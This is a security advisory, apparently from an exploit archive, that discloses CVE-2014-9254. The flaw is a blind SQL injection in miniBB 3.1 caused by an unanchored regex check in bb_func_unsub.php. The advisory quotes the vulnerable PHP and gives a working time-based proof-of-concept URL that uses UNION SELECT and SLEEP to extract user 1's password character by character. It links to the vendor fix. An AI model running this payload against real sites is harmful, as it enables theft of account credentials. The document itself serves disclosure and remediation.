Skip to content
cyberexploits
webappphptext

MiniBB 3.1 - Blind SQL Injection

MiniBB 3.1 - Blind SQL Injection

Published on 2014-12-19

Source code

Pinned to commit 7eac4c3a2ce5
textplatforms/php/webapps/35579.txt7eac4c3a
raw
# Exploit Title: miniBB 3.1 Blind SQL Injection

# Date: 23-11-2014

# Software Link: http://www.minibb.com/

# Exploit Author: Kacper Szurek

# Contact: http://twitter.com/KacperSzurek

# Website: http://security.szurek.pl/

# CVE: CVE-2014-9254

# Category: webapps



1. Description

  

preg_match() only check if $_GET['code'] contains at least one letter or digit (missing ^ and $ inside regexp).



File: bb_func_unsub.php

$usrid=(isset($_GET['usrid'])?$_GET['usrid']+0:0);



$allowUnsub=FALSE;

$chkCode=FALSE;



if(isset($_GET['code']) and preg_match("#[a-zA-Z0-9]+#", $_GET['code'])){

	//trying to unsubscribe directly from email

	$chkField='email_code';

	$chkVal=$_GET['code'];

	$userCondition=TRUE;

	$chkCode=TRUE;

}

else{

	//manual unsubsribe

	$chkField='user_id';

	$chkVal=$user_id;

	$userCondition=($usrid==$user_id);

}



if ($topic!=0 and $usrid>0 and $userCondition and $ids=db_simpleSelect(0, $Ts, 'id, user_id', 'topic_id', '=', $topic, '', '', $chkField, '=', $chkVal))



http://security.szurek.pl/minibb-31-blind-sql-injection.html

  

2. Proof of Concept



http://minibb-url/index.php?action=unsubscribe&usrid=1&topic=1&code=test' UNION SELECT 1, IF(substr(user_password,1,1) = CHAR(99), SLEEP(5), 0) FROM minibbtable_users WHERE user_id = 1 AND username != '



This SQL will check if first password character user ID=1 is “c”.



If yes, it will sleep 5 seconds.

  

3. Solution:

  

http://www.minibb.com/forums/news-9/blind-sql-injection-fix-6430.html
View on GitHub